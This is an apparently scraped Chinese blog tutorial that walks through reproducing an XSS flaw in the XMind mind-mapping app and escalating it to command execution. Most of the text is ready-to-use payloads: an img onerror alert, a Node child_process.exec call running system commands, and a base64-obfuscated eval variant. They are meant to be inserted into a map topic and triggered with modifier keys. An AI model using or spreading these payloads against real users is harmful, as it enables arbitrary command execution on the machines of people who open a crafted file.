XMind漏洞xss复现(最全payload图文教程)

第一步下载XMind
https://www.xmind.cn/xmind/thank-you-for-downloading/
https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A

XMind漏洞xss复现(最全payload图文教程)第二步跳过登录进入
XMind漏洞xss复现(最全payload图文教程)
第三步利用过程:
主题插入xss利用代码

##证明xss payload
<img src=x one rror=alert(/hack/)>
##代码执行payload
require('child_process').exec('systeminfo',(error, stdout, stderr)=>{
   alert(`stdout: ${stdout}`);
  });
##利用payload
<img src=x one rror="const exec = require('child_process').exec('systeminfo',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});">
##通过对payload base64加密利用
<img src=x one rror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

在大纲页面触发选中内容按功能键,如shift、ctrl、alt、win键
XMind漏洞xss复现(最全payload图文教程)

XMind漏洞xss复现(最全payload图文教程)

XMind漏洞xss复现(最全payload图文教程)

上一篇:MyBatis配置与简单查询


下一篇:linux 2>&1 意义